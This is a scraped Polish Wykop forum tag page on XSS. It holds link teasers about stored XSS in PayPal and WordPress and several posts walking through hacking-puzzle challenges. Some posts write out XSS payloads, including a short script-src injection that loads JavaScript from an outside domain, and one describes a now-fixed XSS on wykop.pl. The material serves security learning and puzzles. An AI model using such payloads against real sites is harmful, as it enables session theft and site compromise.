- konto usunięte
- konto usunięte
- luki_sk
- Cronox
Wszystko
Wszystkie
Archiwum
@a__s, może Ty szepniesz tam komuś by sprawdzili czasami zgłoszenia w supporcie xD
#wykop #xss #davyjonespsujewykop <- to tak na zaś gdybym jeszcze coś złapał
- konto usunięte
- konto usunięte
- BigKrs
- nietopies
- deryt
- +4 innych
- 2
- konto usunięte
- konto usunięte
- 2
- kulmegil
- konto usunięte
- 13
Zgłoszony do administracji i usunięty w niecałe 24h.
#security #bezpieczenstwo #xss
- konto usunięte
- konto usunięte
- moooka
- maniac777
- Ziemeck
- +8 innych
- 1
4
Safety Online - [SECURITY] PayPal Stored XSS
Nowoodkryta podatność w systemie transakcyjnym PayPal pozwala na kradzież Twoich...
z- Dodaj Komentarz
- #
- #
- #
- #
18
Persistent XSS na stronie głównej wykop.pl
XSS na wykopie :)
z- Dodaj Komentarz
- #
- #
- #
3
» * [0day] WordPress 4.2 stored XSS
Prosty do wykonania i dość niebezpieczny XSS dla najnowszego WordPressa...
z- Dodaj Komentarz
- #
- #
- #
- #
6
» * Uwaga gracze – włamanie do twitch.tv
Właściciele Twitch.tv podejrzewają że miał miejsce nieautoryzowany dostęp do baz danych serwisu twitch.tv. Nie wiadomo ile i co zostało skradzione.
z- 1
- #
- #
- #
- #
- #
14
XSS w książce… Aktywowany on-line
Nikt nie dziwi się tym, że w wielu książkach o bezpieczeństwie można znaleźć przykłady wykorzystania podatności XSS. Jednak ciekawe jest to, że czasem takiego "papierowego" XSS-a można aktywować on-line.
z- 2
- #
- #
- #
- #
- #
- #
- 0
- 0
10
XSS w rekordach DNS
- 2
- #
- #
- #
http://xssgame.vulnerable.pl/index.php
#hacking #hackujo #xss #zagadkihakerskie
Prosta gra stworzona przez #google ułatwiająca poznanie podstawowych błędów #xss
#programowanie #webdev #bezpieczenstwo #hacking
- kamdz
- Crisu
- filip_k
- MacDada
- konto usunięte
- +4 innych
- 4
- konto usunięte
- Marmite
- varez
- konto usunięte
- konto usunięte
- +4 innych
- 2
http://i.imgur.com/opna6Ug.jpg
#zepsujo #xss
Proponuję kolejną zagadkę hakerską, znów na tapetę bierzemy #xss. Pod adresem http://hakerium.cba.pl/zad8/ znajduje się strona z banalną podatnością typu XSS. Wystarczy wpisać dowolny tekst HTML i zostanie on wyświetlony na stronie, np. http://hakerium.cba.pl/zad8/?imie=%3Cscript%3Ealert%281%29%3C/script%3E
Na czym polega więc zagadka, skoro już podałem rozwiązanie? Ano na tym, że pole
imie
jest ograniczone do 30 znaków. A zatem najprostszy
alert(1)
da radę wykonać, ale odrobinę bardziej skomplikowany
alert(document.domain)
już nie: http://hakerium.cba.pl/zad8/?imie=%3Cscript%3Ealert%28document.domain%29%3C/script%3E
- 1
http://hakerium.cba.pl/zad8/?imie=%3Cscript+src%3D%22%2F%2Fkzlk.pl%2F%22%2F%3E
Jakby domena nie działała (przed chwilą zarejestrowałem) to dopiszcie sobie do pliku hosts:
178.63.136.164 kzlk.pl
- 1
Skorzystamy z tagu iframe i umieścimy XSS-owaną domenę wewnątrz tego iframe'a. Ze względu na same origin policy nie ma możliwości odwoływać się do jakichkolwiek atrybutów strony wewnątrz iframe'a, jeśli ta jest z innej domeny (z kilkoma wyjątkami, m.in.
postMessage
, który tutaj akurat się nie przysłuży). Istnieje jednak pewien atrybut, na który poprzez iframe'a możemy mieć wpływ - jest nim
Opowiem o ciekawym przypadku #xss, który znalazłem ostatnio na #wykop i został już naprawiony. Ciekawy jest dlatego, że nie tak łatwo go wyexploitować... Ale po kolei.
Podatność występowała na niektórych podstronach bezpośrednio w adresach. Gdy w adresie został umieszczony znak cudzysłowia, a następnie nawiasy ostre, można było wyjść z tagu i wprowadzić dowolny kod HTML. Przykład na screenie: http://i.imgur.com/ulCWnvo.png
Może się wydawać: no to jesteśmy w domu, mamy XSS-a! Praktyczne
- rss
- fledgeling
- snx
- Japuch
- eXtreme
- +12 innych
- 1
#javascript #xss #hakujo
57
Zawodowy hacker. Wywiad z pentesterem.
Wywiad z Dawidem Bałutem, który opowiada o swojej pracy pentestera, o znalezionych lukach w takich dużych serwisach jak Facebook, PayPal, Allegro, Groupon, Amazon, o ignorancji administracji, zastraszaniu sądem i o tym jak wygląda praca zawodowego hackera.
z- 17
- #
- #
- #
- #
- #
- #
- #
Ostatnio rzuciłem kolejne wyzwanie związane z bezpieczeństwem stron internetowych. Strona pod adresem http://hakerium.cba.pl/zad2/ jest podatna na błąd typu Cross-Site Scripting (XSS) i celem zadania było dołączenie pliku z zewnętrznej domeny. Zaproponowałem plik spod adresu http://pastebin.com/raw.php?i=mYM90ckz który po prostu wyświetla alert, ale oczywiście można go dużo bardziej rozwinąć.
Sama strona umożliwiała dodawanie komentarzy o długości co najwyżej 100 znaków. Zacznijmy od analizy jak ta strona działa i dlaczego
- Kaerl
- eDameXxX
- draqul
- aRth
- konto usunięte
- +15 innych
- 1
- 1
Błąd na tej stronie jest całkiem ciekawy, ponieważ strona enkoduje dane wyjściowe (tj. np. znak
<
jest zamieniany na
<
, a
"
jest zamieniany na
"
). Pomimo tego i tak udaje się znaleźć podatność i wykorzystać błąd. Wynika to z niedostosowania się do pewnych dobrych standardów w HTML-u. W tym przypadku wystarczyło atrybut wartość atrybutu
title
umieścić w cudzysłowach i błędu już by nie było. Wniosek jest